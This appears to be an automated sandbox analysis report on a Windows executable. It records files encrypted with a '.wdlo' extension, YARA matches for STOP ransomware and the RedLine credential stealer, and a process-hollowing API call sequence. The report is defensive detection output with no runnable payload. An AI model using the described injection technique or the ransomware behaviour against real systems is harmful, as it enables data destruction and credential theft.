          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2.wdlo (copy) entropy: 7.99564979321Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.wdlo (copy) entropy: 7.99491483911Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.wdlo (copy) entropy: 7.99723158727Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.wdlo (copy) entropy: 7.99443062578Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2.wdlo (copy) entropy: 7.99466125861Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.wdlo (copy) entropy: 7.99563142176Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.wdlo (copy) entropy: 7.99782439811Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.wdlo (copy) entropy: 7.99730005623Jump to dropped file

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0000001B.00000002.1495269240.0000000002121000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000018.00000002.1411881019.00000000021C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000009.00000002.1311439366.0000000002139000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0000000A.00000002.1345421470.00000000007B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000001D.00000002.1498273740.0000000002201000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000000.00000002.1276700726.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3712, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 6372, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 2192, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3804, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7336, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7540, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7728, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7756, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7796, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7820, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          PE file contains section with special chars
          Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_021F0110
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 9_2_021D0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,9_2_021D0110
          Source: C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 10_2_02310110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,10_2_02310110
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_004138F00_2_004138F0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_004F0B710_2_004F0B71
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_00412B100_2_00412B10
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F72200_2_021F7220
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_022722C00_2_022722C0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0223E37C0_2_0223E37C
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F73930_2_021F7393
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0220F0300_2_0220F030
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FB0000_2_021FB000
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FA0260_2_021FA026
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FB0B00_2_021FB0B0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F30F00_2_021F30F0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_022000D00_2_022000D0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F70E00_2_021F70E0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F91200_2_021F9120
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0223E1410_2_0223E141
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0221D1A40_2_0221D1A4
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FA6990_2_021FA699
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0223B69F0_2_0223B69F
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FE6E00_2_021FE6E0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FC7600_2_021FC760
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FA79A0_2_021FA79A
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0221D7F10_2_0221D7F1
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F35200_2_021F3520
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F75200_2_021F7520
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FCA100_2_021FCA10
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F7A800_2_021F7A80
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_02200B000_2_02200B00
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F2B600_2_021F2B60
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FDBE00_2_021FDBE0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F78800_2_021F7880
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_022118D00_2_022118D0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021FA9160_2_021FA916
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0220A9300_2_0220A930
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0221E9A30_2_0221E9A3
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_0221F9B00_2_0221F9B0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F89D00_2_021F89D0
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F59F70_2_021F59F7
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F8E600_2_021F8E60
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_02224E9F0_2_02224E9F
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_02232D1E0_2_02232D1E
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F5DF70_2_021F5DF7
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 0_2_021F5DE70_2_021F5DE7
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D160761_2_00D16076
          Source: C:\Users\user\AppData\Local\Temp\HhVfIB.exeCode function: 1_2_00D16D001_2_00D16D00
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040D2406_2_0040D240
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_00419F906_2_00419F90
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0040C0706_2_0040C070
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_0042E0036_2_0042E003
